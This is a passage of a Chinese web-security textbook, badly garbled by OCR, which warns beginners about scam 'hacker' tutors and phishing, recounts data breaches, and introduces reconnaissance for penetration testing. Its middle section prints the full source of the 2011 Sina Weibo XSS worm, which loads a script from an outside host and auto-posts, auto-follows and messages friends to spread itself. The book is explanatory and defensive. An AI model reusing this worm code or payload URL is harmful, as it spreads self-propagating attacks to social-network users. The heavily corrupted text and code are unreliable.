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АСЕМ МБХ, RE АЛЕ I Кан. НОЖ, 
这 时 就 出 现 了 一 些 不 怀 好 总 的 人 ， 利 用 各 种 各 样 的 手段 “伤害 ”读者 ， 我 们 现在 就 来 剖析 
一 下 这 些 和 常见 的 现象 。 
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初学 者 不 了 解 黑 客 的 世界 ， 却 又 不 断 符 试 接触 ， 这 时 ， 不 怀 好 意 的 人 就 会 乘虚 而 入 ， 
利用 初学 者 对 于 黑客 的 不 了 解 ， 目 称 黑客 高 手 ， 说 出 一 些 看 似 高 深 的 名 词 ， 骗 取 初 学 者 的 
信任 ， 并 要 求 其 缴纳 “和 学费 ”， 这 种 行为 与 诈骗 无 神 。 但 由 于 取证 困难 ， 骗 子 很 难得 到 和 
罚 ， 这 更 加 助长 了 他 们 的 嚣张 气焰 。 

在 此 ， 笔 者 将 介绍 一 些 识 别 骗子 的 方法 ， 各 位 可 以 作为 参考 ， 或 告诉 喘 边 对 黑客 技术 
感 兴趣 的 初学 者 ， 提 高 普 惕 ， 谨 防 上 当 受 驻 。 


1. 所 谓 黑 客 


很 多 时 候 ， 骗 子 们 会 在 各 种 社区 、 论 坛 或 是 社交 网 站 上 发 布 类 似 于 “黑客 收 徒 ” 的 信 
恩 ， 往 往 伴随 看 “技术 列表 ”， 如 图 2-1 所 示 。 

这 是 一 种 典型 的 骗术 ， 可 能 那些 人 对 所 列举 的 技术 仅仅 是 知道 名 字 而 已 ， 有 时 打出 的 
“特价 收 徒 ” 则 满 吓 了 一 些 人 信 图 小 利 的 性 格 ， 使 其 上 当 受 骗 。 除 此 之 外 ， 试 想 ， 如 果 这 
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个 人 的 技术 真 的 如 此 高 深 ， 为 什么 还 会 为 了 几 十 元 钱 而 到 处 散布 “ 收 徒 信息 ”， 张 口 财 口 
Зе “СР” Hu? 真正 的 技术 大 牛 应 该 是 抓紧 时 间 研究 技术 ， 提升 目 己 。 另外 笔者 想 纠 
正 一 个 普遍 存在 的 认识 错误 : “盗号 ”很 简单 。 试 想 ， 如 果 盗 号 真 的 如 此 简单 ， 那 让 腾 
讯 、 阿 里 巴巴 这 些 大 公司 的 技术 人 员 情 何以 堪 ? 就 算 真 的 有 人 拥有 这 样 的 技术 ， 他 也 不 
会 为 了 一 些 可 舌 的 理由 去 盗 取 别 的 社交 账号 的 。 
对 于 这 种 情况 ， 不 妨 随 意 想 一 种 不 存在 的 “技术 名 称 ”， 询 问 对 方 是 否 掌 握 ， 如 果 
对 方 想 都 没 想 就 衣 定 ， 那 么 将 言 将 不 攻 目 破 。 如 图 2-2 所 示 ， 我 随意 组 合 了 SQL 和 XSS 两 
个 名 词 。 
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Сї в, ЖЕЛЕ, ве. я 
ви, ЖОО, AYY, ВАМ 
件 ， 都 可 以 的 
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© 会 的 ， 学 费 200， 包 教 包 会 

% + 
图 2-2 与 骗子 交谈 截图 ( 无 论 你 说 
ПА, 最 终结 果 都 会 是 : 伸手 要 钱 ) 


2. 不 要 随意 运行 不 明 程 序 


有 一 些 骗术 手段 更 加 隐蔽 ， 以 发 送 “ 黑 客 软件 ”为 借口 ， 给 没有 防备 的 新 手 发 送 木 马 
软件 ， 镭 取信 息 ， 甚 至 让 你 的 计算 机 在 无 声 无 轧 中 沦 为 “肉鸡 ”《 受 黑客 远程 控制 的 计算 
ВО). 《关于 木马 ， 在 第 9 章 会 有 更 多 相关 介绍 。) 


3. 不 要 被 看 似 “ 黑 客 ” 的 东西 蒙蔽 


很 多 新 手 对 黑客 感 兴趣 是 因为 “觉得 很 酷 ”， 正 因 如 此 ， 骗子 们 f Еа 用 一 些 很 
酪 的 东西 来 吸引 别人 。 例 如 “匿名 者 ”以 及 “V 子 MOIS We 

仇杀 队 ”《 图 2-2 左 侧 头 像 )》，“ 匿 名 者 ”黑客 团 
队 给 人 留 下 的 印象 就 是 “ 酷 ” 和 “神秘 ”， 见 图 
2-3， 也 难怪 很 多 骗子 打 看 “匿名 者 ”的 由 子 招 播 撞 
а Г. 

还 是 那 句 话 ， 真 正 钻研 技术 的 人 是 不 需要 这 些 表 
面 功夫 的 。 用 社交 网 络 上 夸张 的 头像 等 信息 来 彰显 目 
己 “ 黑 客 ” 喘 份 的 人 ， 大 多 数 是 骗子 或 “娱乐 畴 ” 人 ec 
Е. XF ЖЖ”, РЯ. 图 2-3 “匿名 者 ”标志 
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4 以 假 乱 真 的 骗术 


一 些 曾经 在 网 络 世 界 中 招摇 撞 骗 的 人 ， 或 因 巧 合 ， 或 因 其 他 原因 ， 搜 集 了 -一些 技术 书 
籍 的 电子 版 本 或 一 些 效果 明显 的 软件 ， 在 “学 徒 ”缴纳 学 费 后 ， 发 送 给 他 们 ， 其 实说 不 定 
他 们 自己 都 看 不 懂 这 些 书 的 内 容 。 
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娱乐 圈 在 我 们 的 社会 不 可 或 缺 ， 但 在 网 络 安全 的 世界 里 ， 这 个 词 就 颇 有 些 砚 刺 意 义 
了 。“ 黑 客 娱乐 圈 ” 本 身 没有 一 个 准确 的 定义 ， 一 般 认 为 : 没有 钻研 技术 的 精神 ， 整 天 考 
虑 如 何 让 目 己 看 起 来 像 黑 客 ， 仅 会 使 用 一 些小 工具 就 沾沾自喜 、 停 济 不 前 的 人 就 是 娱乐 图 
成 员 ; 也 经 常用 来 代 指 以 “黑客 ”为 咕 头 炒作 目 己 的 人 。 

这 样 的 人 往往 在 一 些 QQ 群 里 出 现 ， 这 些 群 一 般 都 有 成 百 上 干 的 群 成 员 ， 并 且 各 个 群 
之 间 的 成 员 有 首相 当 高 的 重合 性 一 一 这 些 混迹 于 各 种 社交 群 的 人 总 会 添加 不 止 一 个 娱乐 
群 。 如 果 读 者 有 一 位 同学 ， 每 天 沉迷 于 谈论 “ 刷 QQ 钻 石 ”“ 网 赚 ” 这 些 东 西 ， 并 乐 此 不 
疫 地 在 上 自己 的 社交 朋友 圈 发 布 “ 收 徒 信息 ”， 那 么 没 错 了 ， 他 九 成 就 属于 笔者 所 说 的 “ 娱 
乐 圈 ”。 他 们 沉浸 在 目 己 浮躁 的 世界 里 ， 并 乐 在 其 中 。 

这 并 不 是 个 例 ， 很 多 刚 进入 这 个 圈子 或 淘 望 进入 这 个 圈子 的 新 手 都 希望 追求 一 些 更 “ 酷 ” 
的 事物 ， 而 不 是 潜心 钻研 技术 。 好 奇 之 心 人 省 有 之 ， 笔 者 没 资格 要 求 他 们 做 什么 ， 但 希望 他 
们 ， 特 别 是 徘徊 在 “娱乐 圈 ” 的 朋友 们 能 看 清 那 些 光 鲜 下 的 不 实 ， 戒 骄 戒 躁 ， 巷 崖 勒 马 。 


2.2.3” 防 沱 钓鱼 网 站 


钓鱼 网 站 的 存在 确实 给 诈骗 活动 提供 了 便利 〈 例 如 ， 恭 喜 您 获得 了 价值 X x x GJ 
XX 奖品 一 类 ) ， 但 在 此 笔者 要 说 的 重点 是 针对 用 户 账 号 、 密 码 的 钓鱼 页 面 。 

随 看 Web 技 术 越 来 越发 达 ， 制 作 钓 鱼 页 面 的 技术 也 随 之 提高 ， 除 去 用 来 诈骗 的 钓鱼 页 
面 ， 还 有 一 种 钓鱼 页 面值 得 人 们 关注 ， 即 黑客 攻击 钓鱼 页 面 。 这 种 类 型 的 钓鱼 页 面 一 般 以 
得 到 目标 用 户 密码 等 隐私 信息 为 目的 ， 伪 造 目 标 用 户 熟 悉 的 Web 环 境 并 实施 攻击 ， 在 6.4 节 
有 一 个 基于 XSS 的 钓鱼 示例 ， 读 者 可 以 提前 看 一 下 。 

为 了 防范 这 种 钓鱼 攻击 ， 最 便捷 可 徘 的 方法 就 是 留意 浏览 器 URL 信 息 。 

ЕЕ: 此 处 仅仅 是 指 浏览 器 显示 的 URL， 而 并 不 是 点 击 链接 时 的 URL 一 一 因为 
URL 可 以 跳 转 ， 比 如 近期 就 有 一 个 蠕虫 在 各 大 社交 网 站 、 朋 友 圈 传播 ， 中 招 的 用 户 都 
会 以 不 同方 式 发 送 一 个 URL: http://paypassport.suning.com/ids/oauth20/authorize?client _ 
1d=suning 0l&response type=code&redirect uri=http://X X X .com&www.qq.com, 

这 个 链接 实则 是 跳 转 到 了 xxx.com， 攻 击 者 又 在 最 后 加 入 了 www.qq.com 进 行 迷惑 ， 受 
害 者 往往 在 无 意 中 就 成 为 了 螨虫 传 播 的 一 个 环节 ， 这 种 方式 也 被 用 于 隐藏 XSS 的 攻击 。 

那么 ， 在 受害 者 没有 意识 地 进入 攻击 者 的 网 站 之 后 ， 下 一 步 攻 击 又 是 如 何 展开 的 呢 ? 
用 户 的 密码 信息 又 是 如 何 神 不 知 鬼 不 觉 地 泄露 的 呢 ? 


әсе “攻防 交响 曲 一 一 网络 安全 现状 浅 析 Ж 7 Жа 


攻击 者 制作 的 登录 页 面 看 起 来 和 真正 的 登录 页 面 无 异 ， 但 这 个 页 面 的 工作 原理 如 下 : 

(1) 受害 者 输入 账号 、 密 码 信息 。 

(2) 提示 密码 错误 ， 后 台 第 一 次 记录 账号 、 密 码 。 

(3) 受害 者 再 次 输入 账号 、 密 码 。 

(4) 提示 密码 正确 ， 并 跳 转 到 受害 者 真正 想 访 问 的 网 站 ， 同 时 后 台 第 二 次 记录 账 
=. ЖШ. 

(5) 记录 两 次 输入 的 密码 ， 发 送 给 攻击 者 。 

这 样 一 来 ， 抱 有 “我 第 一 次 随便 输入 密码 就 知道 是 不 是 真 的 ”心态 的 防御 方式 彻底 宣 
告 失败 。 

回 到 刚才 的 那 句 话 : “最 便捷 可 靠 的 方式 就 是 留意 浏览 器 上 的 URL 信 息 ”， 伪 装 得 再 
精妙 的 钓鱼 页 面 ，URL 也 有 看 明显 的 不 同 ， 在 登录 时 留意 URL 栏 ， 无 疑 是 一 种 简便 高 效 的 
防御 方式 。 该 方法 不 能 防御 6.4 节 提 到 的 XSS 禾 益 页 和 面 攻击 ， 不 过 无 须 过 于 担心 ， 过 到 这 种 
攻击 的 概率 实在 是 可 以 忽略 。 

还 有 一 点 需要 注意 的 是 ， 有 些 钓鱼 攻击 者 会 用 子 域 名 来 迷惑 用 户 的 眼睛 ， 例 如 : 
www.baidu.com.xxx.com (假设 xxx.com 为 攻击 者 的 网 站 。 ) 

这 就 需要 我 们 睁 大 眼睛 ， 对 于 要 求 输入 密码 的 网 站 多 留心 ， 或 是 观察 浏览 器 提供 的 信 
县 来 发 现 这 些 钓鱼 页 面 〈 一 些 浏 览 器 会 目 动 判断 该 网 站 的 真 伪 ) 。 
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2.3.1 _ CSDN 事件 


2011 年 12 月 21 日 上 午 ， 有 骇 客 在 网 上 披露 CSDN 数 据 库 泄 露 ， 并 提供 了 下 载 地 址 ， 高 
达 600 余 万 个 注册 邮箱 与 密码 泄露 ， 并 且 所 有 密码 都 使 用 明文 储存 。CSDN 是 国内 最 大 的 
以 程序 员 为 核心 的 大 型 网 站 ， 却 采用 明文 储存 用 户 密 码 〈 当 时 即便 是 小 型 BBS 网 站 数据 库 
都 采用 MD5S 等 方式 对 密码 加 密 ) 。 

21 日 晚 ，CSDN 发 布 声 明 并 道 次 。 据 CSDN 官 方 解 释 ， 该 数据 库 为 CSDN 作 为 备份 所 
用 ，CSDN 在 2009 年 4 月 之 前 是 以 明文 保存 密码 ， 而 泄漏 原因 不 详 。 

继 CSDN 的 数据 库 泄漏 之 后 ， 天 涯 社区 、 世 纪 佳 缘 、 开 心 网 等 十 余 家 国内 知名 网 站 的 
近 5000 万 用 户 信 息 陆 续 在 网 上 被 人 公布 ， 各 大 社区 的 信誉 也 遭受 质疑 。 当 然 ， 这 次 严重 的 
事故 同时 也 提高 了 国内 对 网 络 信 息 安全 的 重视 。 


2.3.2 12306 事 件 


2014 年 12 月 25 上 午 ， 乌 云 漏洞 报告 平台 上 出 现 了 一 则 标题 为 “大 量 12306 用 户 数 据 在 
互联 网 站 传 ， 包 插 用 户 账号 、 明 文 密 码 、 身 份 证 号 码 、 邮 箱 等 (泄漏 途径 目前 未 知 ) ” 
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的 新 闻 ， 缺 陷 编 号 为 : WooYun-2014-88532。 这 可 让 网 上 一 下 炸 了 锅 ， 各 种 讨论 与 分 析 瞬 
间 出 炉 ， 根 据 对 泄漏 数据 的 分 析 及 当晚 的 官方 信息 ， 这 次 事件 极 有 可 能 是 一 次 “ 撞 库 攻 
击 ”。 那 么 何谓 “ 撞 库 ”? 就 拿 刚 才 提 到 的 CSDN 数 据 汇 露 来 说 ， 攻 击 者 如 果 用 这 些 泄露 
的 数据 尝试 登录 12306 网 站 ， 或 是 编写 脚本 进行 大 量 登录 测试 ， 就 叫 撞 库 攻击 。 然 而 被 泄 
露 的 数据 远 不 止 CSDN 这 么 多 ， 量 变 引 起 质变 ， 多 米 话 骨牌 效应 导致 了 大 量 数据 的 泄露 。 


2.3.3 “天 河 ” 超 级 计算 机 事件 


2015 年 2 月 12 日 ， 又 一 个 神奇 的 漏洞 引起 了 广泛 关注 ， 这 个 漏洞 竟然 出 现在 超级 计算 
机 天 河 一 号 上 ， 看 实 令 人 震惊 (图 2-4) 。 但 是 仔细 一 看 漏洞 细节 ， 却 又 让 人 啼 突 缘 非 : 
天 河 一 号 的 办 公 环 境 有 一 个 未 加 密 的 无 线 网 络 ， 任 何 设备 都 可 以 轻易 接 入 ， 直 接 进 入 内 
网 。 这 位 日 帽子 小 黑客 顺便 找 了 找 其 他 可 能 存在 的 漏洞 ， 这 一 找 可 不 得 了 ， 他 发 现 天 河 一 
号 超级 计算 机 内 部 存在 大 量 弱 口令 ， 以 及 部 分 服务 器 存在 破 充 漏洞 〈 即 bash 漏 洞 ， 一 个 十 
分 严重 的 Linux 漏 洞 ) 。 
漏洞 概要 


Вайс: WooYun-2015-97005 

漏洞 标题 : 天 河 一 号 超级 计算 机 集群 可 被 登陆 控制 ( 所 有 节点 可 下 发 任务 执行 命令 ， 上 百 账号 泄露 ) F 
相关 厂商 ; 中 国 国家 超级 计算 机 中 心 

漏洞 作者 : zph 

提交 时 间 : 2015-02-12 17:42 


公开 时 间 : 2015-03-29 17:44 
дека: 成 功 的 入 侵 事 件 
CESR: 高 


自 评 Rank : 20 

RARS: 已 交 由 第 三 方 合作 机 构 (cncert 国 家 互联 网 应 急 中 心 ) 处 理 
RAF: http:/ /www.wooyun.org 

Tags 标 签 ; 无 


图 2-4 ”天河 一 号 漏洞 信息 
回顾 以 上 列举 的 3 个 典型 安全 事件 ， 其 部 与 密码 安全 奶奶 相 关 ， 也 正好 对 应 了 密码 安 
全 中 3 个 “过 不 去 的 坎 ”: 明文 存储 、 撞 库 〈 同 一 密码 多 用 〉 和 弱 口 令 。 更 多 关于 密码 安 
全 的 知识 ， 请 见 附 录 。 
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201146528 Н\, H ҖХЖ#5М5М i—i RA Н ТУБ МИ 5-28 52 Х55Җ rH ИН. 
中 招 的 微 博 博 主 会 目 动 通过 广播 和 私信 的 方式 发 布 一 些 诱惑 性 信息 ， 用 户 单 击 链接 后 便 会 
触发 XSS， 发 布 同样 的 信息 并 自动 关注 hellosamy， 中 招 的 用 户 单 击 后 又 会 触发 XSS， 蠕 虫 
便 如 链 式 反应 般 传 播 。 由 于 蠕虫 的 指数 爆炸 型 传播 、 微 博 的 分 享 形 式 以 及 一 些 大 V 认 证 的 
用 户 被 攻击 ， 该 蠕虫 在 16 分 钟 内 就 感染 了 30 000 名 以 上 用 户 ， 可 以 说 是 近 几 年 中 国 SNS 社 
区 受到 的 最 大 的 一 次 攻击 。 

这 次 攻击 并 没有 直接 造成 用 户 的 重大 损失 ， 更 像 是 一 场 黑 客 的 恶作剧 〈 从 收听 的 
hellosamy 用 户 也 能 看 出 ，Samy 是 XSS 蜂 虫 鼻 祖 herosamy 的 作者 ， 他 的 XSS 蠕 虫 曾 造成 社交 
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网 站 MySpace 的 瘫痪 ) 。 但 同样 ， 这 次 事件 也 提高 了 公众 对 信息 安全 的 关注 〈 随 后 新 浪 多 
处 反射 型 XSS 被 披露 ) 。 而 这 次 漏洞 成 因 更 让 人 大 跌眼镜 : 新 浪 对 该 参数 竟然 完全 没有 过 
Е! 这 次 攻击 在 Chrome、Safari 中 会 被 XSS Filter 拦 截 ， 而 IE、Firefox 未 能 和 幸免， 根据 当时 
耻 、Firefox 的 市 场 占有 率 ， 这 的 确 是 一 次 范围 很 广 的 攻击 。 

让 我 们 来 分 析 一 下 这 个 被 用 来 传播 XSS 蜂 虫 的 URL: 


һр: / /четБо .сош/рир/зЕаг/а/хуууй" ><ѕсгірі згс=//мии.2КЕ.сп/1тааез/ 
Е.)5></зсгърЕ>?Гуре-прда е 


在 访问 这 个 URL 时 ， 新 浪 会 对 字符 串 进行 处 理 ， 结 果 变 成 了 访问 : 


ПЕЕРр: //меіро. сот/рир/ѕёаг.рһр?ӯ=хуууа" ><всгіре згс=//мии.2КЕ.сп/ 


images/t.jJs></script>?type=update 


由 于 参数 g 并 没有 进行 应 有 的 过 滤 ， 导 致 这 个 来 自 外 部 的 J 脚 本 被 通 入 页 面 内 。 


function CreateXHR () | 
return window.XMLHttpRequest? 
new XMLHttpRequest(): 
new Асііуехорјесі+ ("Microsoft .ХМЬНТТР") ; 
) 
function getappkey(ur1) { 
xmlHttp = createxHR(); 
хм! НЕТр.ореп ("СЕТ", url, false); 
XmlHttp .send () ; 
result = хи1НЕЕр.гезёроп5еТехЕ; 
іа агг = *'; 
id = result.match (/пашесага=\"Егае\" Е1Е1е=\" [^\"] х/д); 
for (1=0;1<1а.1епдёһ;і++) 4 
sum = 1а[1].Ео5Ег1пд () -зр11('"') [3]; 
то e aume И Ы 
} 
return 19 агг; 
} 
function random msg () { 
link = ' http://163.fm/PxZHoxn?1d=' + пем Date () .getTime ();; 
var msgs = | 
' 郭 某 某 事 件 的 一 些 未 注意 到 的 细节 : ', 
' 让 女人 心动 的 100 句 诗歌 : ', 
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' 3D 某 团团 高 清 普通 话 版 种 子 : ', 
' 这 是 传说 中 的 神仙 着 但 啊 : ', 
Е АУТ: ', 
' 杨 某 被 爆 多 次 被 潜 规 则 : ' , 
' 傻 仔 拿 锤子 去 抢 银行 : "， 
' 可 以 监听 别人 手机 的 软件 : ', 
' 个 税 起 征 点 有 望 提 到 4000: "1; 
var msg = msgs [Маһ .Поог (Math.random ()*msgs.length)] + link; 
msg = encodeURIComponent (msg) ; 
return msg; 
} 
function post(url,data,sync) { 
xmlHttp = сгеатехнк (); 
хи] НЕЕр.ореп ("РО5Т" Url, sync); 
XmlHttp . зе Ведаез{Неааег ("Ассері", "text/html,application/ 
xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); 
xmlHttp.setRequestHeader ("Content-Type","application/x-www-form- 
urlencoded; charset=UTF-8"); 
xmlHttp.send (ааба); 
} 
function publish() í 


/* 

* 发 送 带 有 里 虫 链接 的 广播 传播 自身 

21 

url = 'http://weibo.com/mblog/publish.php?rnd=' + пем Date() . 


getTime(); 
data = 'content=' + random msg() + '&pic=&styleid=2&retcode='; 
розі (игі, Дага true); 


) 


Function Ғо11ом()( 


/х 
ХИ пет тозашу 
А 

url = 'http://weibo.com/attention/aj addfollow.php?refer ѕогі=рго 


Ғі1е&аіпІа=ргой1е&гпа=' + new Date() .getTime (); 
data = 'uid=' + 2201270010 + '&Егоши1А=' + $CONFIG.$uid + '&геЕег_ 


ѕогі=ргой1е&ваіпІа=ргоћ1е!'; 
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post (url, data, true); 


} 


function message () | 


/ x 
* 自 动向 好 友 发 送 含 蠕虫 链接 私信 
ЗЕ 
url = 'http://weibo.com/' + $СОМЕТС.$и1аА + '/ЁЕо11ом'; 


ids = getappkey (url); 

ТО таз И 

for (1=0;1<id.length - 1 6 1<5;1++) { 

msgurl = 'http://weibo.com/message/addmsg.php?rnd=' + пем Date() . 
getTime (); 


msg = random msg (); 


msg = encodeURIComponent (msg) ; 
user = encodeURIComponent (encodeURIComponent (id[i])); 
data = "'content=' + msg + "'&name='" + user + "егессойе-"; 


post (msgurl]l,data, false); 

} 
} 
function таіп () { 
Егу( 

publish(); 
} 
catch (е) { } 
Сгу{ 

Го11ом (); 
} 
catch (е) { } 
РУ 
message (); 

} 
catch (е) { } 
} 
Егу( 
х= g=document.createElement ('script');g.src='http://www.2kt.cn/ 
images/t.Js';document.body.appendChild(g)";window.opener.eval (x); 


} 
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catch (е) { } 


Maini: 


var t=setTimeout('location="http://weibo.com/pub/topic";',5000); 


24 开源 理念 


“开源 ” 即 开放 源 代 码 ， 具 有 开源 特性 的 软件 〈 包 括 操 作 系统 ) ， 其 源 代 码 对 所 有 人 
开放 ， 任 何人 均 可 以 修改 、 使 用 、 再 发 行 这 些 软件 。 下 面 让 我 们 来 简单 地 了 解 一 下 开源 。 

相信 大 家 都 听 说 过 GNU 基 金 会 基于 Linus Torvalds 开 发 的 Linux 内 核 创立 的 GNU/Linux 
(也 称 Linux)〉 操作 系统 ， 它 的 许多 发 行 版 本 例如 Debian、Ubuntu、Red Hat 等 均 为 基于 开 
源 内 核 的 再 创作 ， 广 为 程序 员 与 技术 人 员 所 知 。 本 书 中 提 到 的 许多 软件 ， 如 Virtual Box 虚 
拟 机 等 ， 也 是 开源 软件 。 

开源 软件 并 非 如 其 字面 意义 一 般 只 是 简单 地 放出 软件 的 源 代码 。 开 源 软 件 需 要 配备 开 
源 许可 证 ， 不 同 的 开源 软件 通常 会 因 不 同 的 开源 目的 选择 不 同 的 许可 证 ， 例 如 Linux 内 核 
使 用 的 是 GPL 许可 证 ， 而 Android 系 统 使 用 的 是 Apache 许 可 证 。 不 同 的 许可 证 决定 了 大 家 
可 以 如 何 使 用 这 份 代 码 ， 例 如 GPL 许可 证 规定 了 任何 使 用 了 GPL 源码 的 程序 也 必须 用 GPL 
许可 证 开源 。 常 见 的 开源 许可 证 有 GPL、MIT、Apache、MS-PL 等 。 开 源 软件 在 国外 通常 
也 被 称 为 目 由 软件 (Free Software) ， 目 由 软件 的 一 个 关键 特征 就 是 它 的 许可 证 ， 不 使 用 
开源 许可 证 发 布 的 源 代 码 在 美国 法 律 中 依然 被 认定 为 专 有 【作者 享有 完整 知识 产权 ) $ 
件 ， 例 如 微软 发 布 的 Reference Source。 国 内 在 开源 软件 领域 沿 处 于 法 律 讶 区， 也 造成 了 一 
些 大 型 厂商 无 所 顾忌 ， 出 现 了 不 遵守 开 源 协 议 的 现象 。 

开源 代表 看 目 由 、 高 效率 和 共享 。 作 为 程序 员 、 开 发 人 员 的 读者 ， 可 以 使 用 源 代码 
进行 二 次 开发 并 册 发 布 ， 也 可 以 对 原始 开源 项 目 进行 拓展 ， 将 更 改 提交 回 原 始 代码 仓库 ， 
使 开源 软件 的 特性 更 多 、 功 能 更 强大 、 更 易 使 用 ， 同 时 提升 普通 用 户 的 使 用 体验 。 这 些 对 
开源 软件 做 出 贡献 的 开发 者 也 称 为 开源 者 ， 他 们 和 其 他 为 开源 软件 做 出 贡献 的 人 员 《 例 如 
进行 本 地 化 或 参与 测试 的 人 员 ) 组 成 了 开源 社区 。 近 些 年 随 看 互联 网 的 高 速 发展 ， 开 源 在 
国内 也 越 来 越 受 欢迎 ， 各 类 开源 社区 大 量 涌现 ， 许 多 城市 都 有 了 当地 的 LUG (Linux User 
Group/Linux，Linux 用 户 社 组 ) ， 还 有 一 些 类 似 AOSC《〈 安 同 开源 社区 ) 这 样 专 精 于 开发 
目 己 的 开源 软件 /系统 的 社区 。 开 源 与 开发 者 、 使 用 者 是 相得益彰 的 ， 而 它 所 体现 出 的 目 
由 、 共 享 与 探索 精神 ， 则 与 黑客 精神 在 本 质 是 相通 的 。 

我 们 会 在 第 4 章 讲 到 对 开源 CMS (Content Management System) 的 审计 技巧 ，CMS 即 
内 容 管理 系统 ， 随 者 Web 2.0 时 代 的 发 展 ， 越 来 越 多 的 企业 、 个 人 在 使 用 CMS 建设 网 站 。 
由 于 几乎 所 有 CMS 都 开源 ， 所 以 很 多 的 CMS 漏洞 挖掘 实际 上 是 基于 代码 审计 ， 也 就 是 白 
盒 漏 洞 挖 掘 。 在 阅读 代码 审计 章节 前 ， 请 先 锻炼 一 下 目 己 的 代码 阅读 能 力 。 


网 络 安全 现状 浅 析 = 7 Жа 


2% ”攻防 交响 曲 


2.5 Жі 


黑客 的 世界 五 彩 缤纷 ， 但 又 充斥 着 华 而 不 实 的 东西 ， 黑 客 确实 看 起 来 很 酷 ， 但 这 酷 的 
背后 其 实 缠 含 看 十 分 艰 吾 的 学 习 过 程 ， 希 望 一 距 而 就 的 人 往往 会 落 进 不 怀 好 意 者 的 圈套 。 
黑客 与 安全 并 不 是 相对 的 ， 他 〈 它 ) 们 相辅相成 一 一 因为 有 黑客 的 探索 才 会 有 安全 ， 叉 正 
是 因为 无 法 做 到 绝对 安全 ， 黑 客 才 有 存在 的 意义 。 如 条 你 确定 目 己 有 坚持 下 去 的 角力 ， 请 
翻 开 下 一 页 ， 我 们 将 开始 真正 地 讲述 那 看 起 来 神秘 的 “黑客 技术 ”。 
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何谓 Web 渗 透 测 试 〈(Penetration Test) ? 相信 大 家 对 Web 都 不 卫生， 渗透 测试 一 般 是 指 
通过 模拟 黑客 的 恶意 攻击 ， 来 评估 计算 机 网 络 系统 的 安全 性 ， 阁 发 现 系统 存在 漏洞 ， 则 提 
交 渗 透 报 告 给 被 测试 系统 的 拥有 者 ， 并 提供 修复 方案 。 本 章 将 通过 对 Web 应 用 及 服务 器 的 
渗透 测试 ， 市 各 位 详细 了 解 渗 透 测试 的 方法 和 技能 。 

本 章 知识 涉及 的 内 容 较 为 分 做 ， 希 望 谈 者 能 够 掌握 学 习 技巧 ， 务 必 杀 目 动 手 实践 ， 
“ 熟 ” 方 能 生 “ 巧 ”。 


3.1 渗透 信息 搜集 


信息 搜集 是 Web 渗 透 的 第 一 步 ， 也 是 至 关 重 要 的 一 步 〈 实 际 上 除了 Web 滩 透 ， 很 多 工 
作 的 第 一 步 都 是 信息 搜集 ) 。 一 次 完整 的 渗透 过 程 是 漫长 的 ， 前 期 信息 搜集 可 以 让 人 们 初 
步 了 解 渗透 目标 ， 而 后 期 信息 搜集 却 往往 是 成 功 的 关键 。 任 何 攻 击 与 防御 之 间 的 较量 ， 都 
是 基于 信息 的 掌控 程度 ， 在 信息 不 对 等 的 情况 下 ， 很 容易 出 现 误 判 或 失误 。 在 安全 行业 团 
队 的 测试 中 ， 信 息 搜 集 被 视 为 “最 重要 ， 最 耗 时 ”的 一 个 步骤 ， 甚 全 有 专门 的 成 员 负 责 信 
恩 的 搜集 与 分 机 。 下 面 我 们 来 了 解 一 些 冲 用 的 信息 搜集 技巧 〈 这 里 使 用 的 词语 是 “信息 搜 
集 ” 而 非 “信息 收集 ”， 是 因为 “ 搜 ” 字 能 更 好 地 体现 出 归纳 整理 的 含义 ， 有 一 定 的 选择 
性 和 方 同 性 〉。 
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1. ЙД 


何谓 劳 站 攻击 ? 就 是 一 个 服务 器 上 有 多 个 Web 站 点 ， 而 我 们 的 渗透 目标 是 其 中 的 一 个 
Web 站 点 ， 当 我 们 无 法 拿 下 目标 站 点 时 ， 则 可 以 尝试 对 服务 右上 的 其 他 站 点 进行 渗透 ， 然 
后 再 通过 跨 目 录 或 提 权 等 方法 拿 下 目标 站 点 。 常 见 的 劳 站 三 询 流 程 如 下 。 

(1) 获得 渗透 目标 的 真实 IP 地 址 。 
(2) 利用 网 站 平台 、 工 具 反 但 IP 地 址 。 


2. 端口 扫描 


一 台 计 算 机 开放 的 端口 和 它 开 放 的 服务 是 对 应 的 ， 而 渗透 测试 人 员 可 以 通过 端口 扫描 
大 致 了 解 目标 开放 了 哪些 服务 ， 如 80 端 口 对 应 了 HTTP 服 务 ，3306 端 口 对 应 了 MySQL 数据 
库 ，1433 端 口 对 应 了 MSSQL 数 据 库 。 通 过 对 开放 端口 的 分 析 ， 我 们 便 可 以 大 致知 道 目 标 
网 站 使 用 了 什么 数据 库 ， 并 可 以 尝试 进行 数据 库 的 爆破 。 此 外 ， 端 口 扫 摘 对 后 台 的 查找 和 
后 期 的 提 权 也 是 至 关 重 要 的 。 那 笛 见 的 端口 扫 摘 方式 又 有 哪些 呢 ? 

(1) 在 线 平台 。 很 多 平台 都 提供 端口 扫描 的 功能 ， 并 且 提 供 稼 见 服务 的 默认 端口 ， 
如 图 3-1 所 示 。 


一 一 一 一 一 


/ 


жонжа 
мпе: 
IP/ 域 各 : Е 18 
工具 简介 
ЖЫТ Н р] ДЕНЕ НЕГА Ге АНИ. 
звапе: 
ЕЕК : 


(1).НТТРИ ИН Е ЕНЕНЕ Г 5 : 80/8080/3128/8081/9080 
(2). Боске Ива ти 95 : 1080 

(3). FTP ( НА ) 协议 代理 服务 露 常 用 端口 号 : 21 

(4). Telnet (远程 登录 ) 协议 代理 服务 器 常用 匡 口 23 


НТТР $ , ИАН 28 0Дер ( ЖЗЕхеског НЯ ) ; 

HTTPS ( securely transferring web pages ) ВЕ. ЖАН 13 7144 З3/ср 443/udp : 

Тепе (ЖеНа ХЕ), Г Е5423/\ср (木马 Tiny Telnet Server 所 开放 的 纺 口 ) : 

ҒТР, АЗГЕ 3421/©ср ( 木马 Doly Trojan. Fore, Invisible FTP、WebEx、WinCrash 和 Blade Runner 所 开放 的 庄 口 ) 
TFTP ( Trivial File Transfer Protocol ) , АВС 69 Лир; 

SSH ( 安全 登录 ) SCP (У). ПЕЕВ. ИИС 55522/©ср: 

SMTP Simple Май Transfer Protocol (E-mail) , АВ | 1532525 /ср (木马 Anbgen、Emall Password Sender. НаеБи Coceda. Shtrilitz 
Steakh、WinPC、WinSpy 部 开放 这 个 苇 口 ) : 

POP3 Post Office Protocol (E-mail) ‚ АЛШ 171955 110/ср ; 

WebLogic , 803577001: 

WebSphere 应 用 程序 , 默认 的 沪 口 号 为 9080 ; 

WebSphere 管 理工 具 ,默认 的 端口 号 为 9090 ; 

28055, 圭 认 的 坑口 号 为 8080 ; 


图 3-1 在 线 端口 扫 摘 平台 


